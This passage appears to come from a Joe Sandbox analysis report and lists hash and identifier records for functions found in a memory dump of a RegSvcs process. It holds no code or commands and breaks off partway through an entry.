                                                                  • Instruction ID: 97020ee0ac0e2079222ad37f30b81b6f60ed4f5214682a5f4dfab9acb97c534e
                                                                  • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                  • Instruction Fuzzy Hash: 51018432600106AFF7269B5CCC04B5AFAAAFB45760F058468EE059B168DB71DD80CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                  • Instruction ID: 20033f328148eb8f0dfc5ec094eb2b87c5adc2392209e56bd2799d653e1002a9
                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                  • Instruction Fuzzy Hash: 3B012232404B229BCB319F99DC40A327BA9FF55B60708CB6EFD958B281D331D801CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bcbcc024ad95cb5b25ccf8b6475e8c0b2cd180f931d426f4f483e19db6df119e
                                                                  • Instruction ID: a3347db391a23de6942b0f653c609738b2ae8536f1d52b040ae6b2afab58459d
                                                                  • Opcode Fuzzy Hash: bcbcc024ad95cb5b25ccf8b6475e8c0b2cd180f931d426f4f483e19db6df119e
                                                                  • Instruction Fuzzy Hash: 1401C4725C16019FC3229F1CDC40E12F7ADEB91774B254259EDAA9B196D630DC41CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b8b5b033ef3453e67906559b8734ce8a82b383d0b292cf372a5dc542b061019
                                                                  • Instruction ID: 384168c6e921ed4ec9e6580d63309ca9972359a99645c72d9c3130570037fc48
                                                                  • Opcode Fuzzy Hash: 2b8b5b033ef3453e67906559b8734ce8a82b383d0b292cf372a5dc542b061019
                                                                  • Instruction Fuzzy Hash: F911CB32241700EFDB26EF09CD80F06BBB9FF54B84F2004A8EA058B6A1C631ED01CA94
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df4f92e3ed781af0cb08236884dce254e142783003ef85bae13c0a1fca27886b
                                                                  • Instruction ID: 7f3733c598d5c02c63476068259c8ce7798841f206e91ef65d636b827606b973
                                                                  • Opcode Fuzzy Hash: df4f92e3ed781af0cb08236884dce254e142783003ef85bae13c0a1fca27886b
                                                                  • Instruction Fuzzy Hash: 24117071941219ABDF25EB64CD52FE9B379BF08714F5081D8A318A61E0D7709E81CF88
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ea47d635afbd724d4303b31d7d5f87fffb02947bdba677c9f70c794271efa32
                                                                  • Instruction ID: 99f5cba6bf3649133a3fe4ccf3dbadd4c9b80da4f2eaa93fdc741e79c188b544
                                                                  • Opcode Fuzzy Hash: 3ea47d635afbd724d4303b31d7d5f87fffb02947bdba677c9f70c794271efa32
                                                                  • Instruction Fuzzy Hash: 73112973900019ABCB11DB98CC84EEFBB7DEF48254F044166E906E7211EA34EA55CBE4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                  • Instruction ID: 8ad076c671f0e734945d452bfe5f251274626dfc4c68dba3adf7342fe4ed4188
                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                  • Instruction Fuzzy Hash: 2001F532201200ABEF119A59DC94A92B76FBFC4610F5541A9ED018F346DB718C81C790
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0ca5d1b53296f6b48c741f824b1ece600043c0ee1b8efab9b675e54ea8beb8ed
                                                                  • Instruction ID: fae2342e545f2999eb4bc8ed3a328fdbd128a39282f39a902fed3172afe37a0c
                                                                  • Opcode Fuzzy Hash: 0ca5d1b53296f6b48c741f824b1ece600043c0ee1b8efab9b675e54ea8beb8ed
                                                                  • Instruction Fuzzy Hash: 3A11E5326401559FC301CF19C800BA5F7B5FB56314F18815AFC448B315D731EC81CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e71271fdcd1afe085225b04f8d9bcbe8e80bbae61117deb2eef8fbff678c0c48
                                                                  • Instruction ID: 7e9cc843357ce191c84bb1279be92b3399ac93d58992bccc03fb44249c951588
                                                                  • Opcode Fuzzy Hash: e71271fdcd1afe085225b04f8d9bcbe8e80bbae61117deb2eef8fbff678c0c48
                                                                  • Instruction Fuzzy Hash: 1211E8B1E002099BCB04DFA9D585AAEBBF9FF58250F10806AA905E7355D674EE01CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e0c19a7af4de530d94f2316036ae8cb2e337efdaadfe5ad5b0c027f4dced4901
                                                                  • Instruction ID: bfcf82a98454827d2232b2be9778bcd14917a82cc35297316b0d7af537a5adf0
                                                                  • Opcode Fuzzy Hash: e0c19a7af4de530d94f2316036ae8cb2e337efdaadfe5ad5b0c027f4dced4901
                                                                  • Instruction Fuzzy Hash: 8E01B132580211ABCB32AB19885093AFBAAFF91660B44846EE1955B612CF20DD82CB91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                  • Instruction ID: 5bb38f1d49364825caf8bf15ebb88b41b63089cb00d5b62c78b992fe8a2cdf10
                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                  • Instruction Fuzzy Hash: EF01F5321007059FEB22A6AACC04AA7B7EAFFC5254F04851DA9468B640DB71E402CB60
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7ca31409bcc2a5d321b5d632895b2afa36ace4e05561f3e8fc96c036bb3f26b
                                                                  • Instruction ID: 876787d950fcc7df0b11dd054375e025db0c8b97fc744f812b33f9cb0b19b364
                                                                  • Opcode Fuzzy Hash: f7ca31409bcc2a5d321b5d632895b2afa36ace4e05561f3e8fc96c036bb3f26b
                                                                  • Instruction Fuzzy Hash: 2B116175E0020DEFCB05DFA4CC50FAEBBB6EB44254F008059EA0197290DA359D11CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f534d133fc8c2f8c3c7e7d3782a250ae435b7d66aab668705fb143a47046287f
                                                                  • Instruction ID: f6ca0d1d5275b1c5b02434df1b83dfff8d49ba930cc2b174c8f59cc253a6c20e
                                                                  • Opcode Fuzzy Hash: f534d133fc8c2f8c3c7e7d3782a250ae435b7d66aab668705fb143a47046287f
                                                                  • Instruction Fuzzy Hash: 7201A7B1681A01BFD311BB79CD80E57FBEDFF55664740052DB20983A51DB24EC51CAE4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a51be0a596bbe6566f31c5e77313ce28cf55956f56f54836e93cfc20e0738807
                                                                  • Instruction ID: 904718faeb90b37b7c953b0f0e540beb40e53d970d4b059f4997fccd0a175c67
                                                                  • Opcode Fuzzy Hash: a51be0a596bbe6566f31c5e77313ce28cf55956f56f54836e93cfc20e0738807
                                                                  • Instruction Fuzzy Hash: 7E01FC32214216DBC320DF6DC848A67FBB9FF54660F11416AFD59872C0E7309A02C7D1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac2ae90984d57558108d5a532e5761e00bbe702fc1d4b1e6ae75ca66d671661f
                                                                  • Instruction ID: a5be662d0d37a0de30aeddb0cb9c68368874fab2120483963e73ec0b1e21be6c
                                                                  • Opcode Fuzzy Hash: ac2ae90984d57558108d5a532e5761e00bbe702fc1d4b1e6ae75ca66d671661f
                                                                  • Instruction Fuzzy Hash: C4115B75A40209EBDB15EFA8C844EAEBBB6EB58250F004099FD0197354DA34EE11CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: edaf3863e8afa92c6c6164ca13f599e9722cb7a60e9771a34750434c12c5128b
                                                                  • Instruction ID: 25b0ec0f7eebaf59122ce2bc3652e87690700db9e57efc9b8badb741ab29f22b
                                                                  • Opcode Fuzzy Hash: edaf3863e8afa92c6c6164ca13f599e9722cb7a60e9771a34750434c12c5128b
                                                                  • Instruction Fuzzy Hash: 271179B1A083089FC700DF69C841A5BBBE4EF98310F00855EB998D7390E630E900CB96
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c0e8c2f07e7be2682799e4544f098c80a8afaf7799f35ab58b1aba49cbf6783
                                                                  • Instruction ID: 2a7884563ca8fdda65dd342f3f8195b6086d042d37b4e42528d03b792411a6a3
                                                                  • Opcode Fuzzy Hash: 6c0e8c2f07e7be2682799e4544f098c80a8afaf7799f35ab58b1aba49cbf6783
                                                                  • Instruction Fuzzy Hash: FD1139B2A183099FC710DFADD841A5BBBE4FF99750F00855EB958D73A4E630E900CB96
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction ID: b8139a9bb6da7429e852725a7173b513676f95a90b8ede58ab507c4e41bb3cea
                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction Fuzzy Hash: C6018B32241680DFE322971DCD48F26BBE8EF54B54F4904A2F905CB7A1D779DC51CA61
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 82538a3a9e40c50a94d6762bd9c42aee7e38808750d658ee090a4902398dd4bf
                                                                  • Instruction ID: aaba32327fb6328c5bdebcd088f63c4a2cd58d6d9433292bd730d630a1b98b9c
                                                                  • Opcode Fuzzy Hash: 82538a3a9e40c50a94d6762bd9c42aee7e38808750d658ee090a4902398dd4bf
                                                                  • Instruction Fuzzy Hash: 6001A232700A09DBDB14FB6EDC149AFB7ADFF80620B958129DA01AB748DE30DD02C6D0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 4dc694323bef01f5faeb56cf35ecfd0822014bfe000b9bed3d42c6e8ea163095
                                                                  • Instruction ID: 877d8b14456a1db3312af002fcc2219fdf5320bf738cf24ba03f269e2176a525
                                                                  • Opcode Fuzzy Hash: 4dc694323bef01f5faeb56cf35ecfd0822014bfe000b9bed3d42c6e8ea163095
                                                                  • Instruction Fuzzy Hash: FC018F716C4601AFD3366B1AD850F06FAA9EF95F60F11442EB2469B391DAB0D8818B68
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64ad6c4bbe712850ce75958a0ab2b7d47169a6c968b79f439e301776607d0bd5
                                                                  • Instruction ID: e61582df95e2235d5392e92b18db4be8a5d3e65c371fd0c43d5f6c08446fd9b3
                                                                  • Opcode Fuzzy Hash: 64ad6c4bbe712850ce75958a0ab2b7d47169a6c968b79f439e301776607d0bd5
                                                                  • Instruction Fuzzy Hash: 06F0A433A41A21BBCB31DB5A8D50F57BEAEEB84A90F15402DA60697740DA30ED01CAA0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                  • Instruction ID: f16ac41bbd2178fd852403598710dcf152fa57c5f5249d93daf1207c42e5b96e
                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                  • Instruction Fuzzy Hash: 01F062B2A00615ABD334CF4DDC40E57FBEADBD5A90F05812DA655D7320EA31DD05CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9acbafc6e21426ff3889982f86b913e7e06d0dd970e4128300d27a33400d2c86
                                                                  • Instruction ID: b4e0616fd7a49d7220098440b6711447e96719cf3b563de727fa9bd7e95c21a5
                                                                  • Opcode Fuzzy Hash: 9acbafc6e21426ff3889982f86b913e7e06d0dd970e4128300d27a33400d2c86
                                                                  • Instruction Fuzzy Hash: 32012CB1E10209EBDB04DFAAD951AAEB7F8FF58304F50406AF904E7350D674DA018BA4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                  • Instruction ID: b932d029e1adc278e8bdcdabeaead44625f29d8c1bb101c7be2953defcdadd4a
                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                  • Instruction Fuzzy Hash: 82F0FC73205623ABD732365D4C40BABB9968FE1A64F1A4239E2059B340CA618D0396F0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 70f466c48afa0a97a8ab15035da369a8887c56916b3164d968218ae1c8b52975
                                                                  • Instruction ID: 253d0895cf39d172d4319ea683f39e0e8feda97399bd1fba8d47a53aef48d9fd
                                                                  • Opcode Fuzzy Hash: 70f466c48afa0a97a8ab15035da369a8887c56916b3164d968218ae1c8b52975
                                                                  • Instruction Fuzzy Hash: 73012171E10209EFCB04DFA9D951AAEB7F9EF58314F50806AF904E7351D6749D01CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 93ad6aaffc4b69fad8b3de9d9fcb31945d61a64db78834bdff9be4e97ff08f1e
                                                                  • Instruction ID: 124aaa7e0e40ebec965bd9cd9269064d8196cdf5694fbfe28ff1386679986707
                                                                  • Opcode Fuzzy Hash: 93ad6aaffc4b69fad8b3de9d9fcb31945d61a64db78834bdff9be4e97ff08f1e
                                                                  • Instruction Fuzzy Hash: D40121B1E00209EBDB04DFA9D945A9EB7F9EF58304F50806AF914E7350D6749D018BA4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                  • Instruction ID: 40fb9b95fcd619e015d5fd879d94432be872aeb671b502896770c9c697dd73f9
                                                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                  • Instruction Fuzzy Hash: D201F932600685EBD3239B9DCC09F69FBD9EF51B50F0940A9FE488B791D775C801C655
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef47760931e103fa78139f6db7472bcf05251a491e948eabc67a9a78f9315006
                                                                  • Instruction ID: 4ce0a1009cfb54db7214a285efa4bbd43960f0c7a2a47c40a7ff6b04fd07c30e
                                                                  • Opcode Fuzzy Hash: ef47760931e103fa78139f6db7472bcf05251a491e948eabc67a9a78f9315006
                                                                  • Instruction Fuzzy Hash: 2D012C71E002499FDB04DFA9D945AAEBBB8AF58310F54405AF901A7390DB74AA01CB99
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                  • Instruction ID: 08a61c6f0108afcc94a3bb5e7fb714876e4548b0e3f543b8f834f0a0ac42f9c7
                                                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                  • Instruction Fuzzy Hash: E7F0127210001DBFEF019F94DD80DEFBB7EFB55298B104125FA1192160D671DD21ABA0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bb32b891ea1f262839e6295b3655eb4e6397ea6681efbd20c542e95e1e27e1a3
                                                                  • Instruction ID: 306c7d643aa60d22ef4fa14ad13c60527e29f766f29794986f0eef0d13753ae0
                                                                  • Opcode Fuzzy Hash: bb32b891ea1f262839e6295b3655eb4e6397ea6681efbd20c542e95e1e27e1a3
                                                                  • Instruction Fuzzy Hash: 7F018936105149EBCF129E88D840EDE7F66FB4C664F158101FE1966224C336D970EB81
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87b9d75aac6e3790da3685da257c9704585e26cee00e06a1e13277dcf8dbe535
                                                                  • Instruction ID: e86c6b652d80f23d5fdf34478e86c0bac92ebd1d952953b55ab3fb6daacd3119
                                                                  • Opcode Fuzzy Hash: 87b9d75aac6e3790da3685da257c9704585e26cee00e06a1e13277dcf8dbe535
                                                                  • Instruction Fuzzy Hash: 92F024712042415BF710AA2DDC91BA3329AE7E0756F25816AEB458B3C1EE70DC0183B4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f883ee5cd4918423aaf83ff07e973f3c6cd8e6ab577fb694a2242c19127c264
                                                                  • Instruction ID: 1125a33f9c88961ba9e2c91ec9de6dd0133fd4e12a64fff8f02c648b2d92addc
                                                                  • Opcode Fuzzy Hash: 5f883ee5cd4918423aaf83ff07e973f3c6cd8e6ab577fb694a2242c19127c264
                                                                  • Instruction Fuzzy Hash: DC01A970240781DBE3239B6CCD48F35B7D4FB54F04F944198BA01DB7EAD768D4418618
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                  • Instruction ID: 0e1b45f89c6a1cea530293e2585552b181d5afbf110381cf5a7f26933e0fb03e
                                                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                  • Instruction Fuzzy Hash: 86F02E32341D1347EB3EAA2D8810B3EF656AFD0E40B05052C9683EB641DF20DC00C780
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                  • Instruction ID: 6971bf744228735a3b4438727977fad05bd0ee4d7aae7f36926e45cd0d916bb1
                                                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                  • Instruction Fuzzy Hash: F1F08933B916119FD3329A4DDC80F16F769EFD5A60F591079AE059B268CB60EC41CBD0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f6e7dfac38c782a48c9ce9f5708e6cf259883f2b409eea706f05201754556fc
                                                                  • Instruction ID: df320c10b718d12b767c9aae3b6b58505aba26307f46fb51338e105970476ae6
                                                                  • Opcode Fuzzy Hash: 7f6e7dfac38c782a48c9ce9f5708e6cf259883f2b409eea706f05201754556fc
                                                                  • Instruction Fuzzy Hash: 66F0AF71A553049FC310EF68C945A1AB7E4FF98710F40865EBC98DB394EA34E900CB9A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
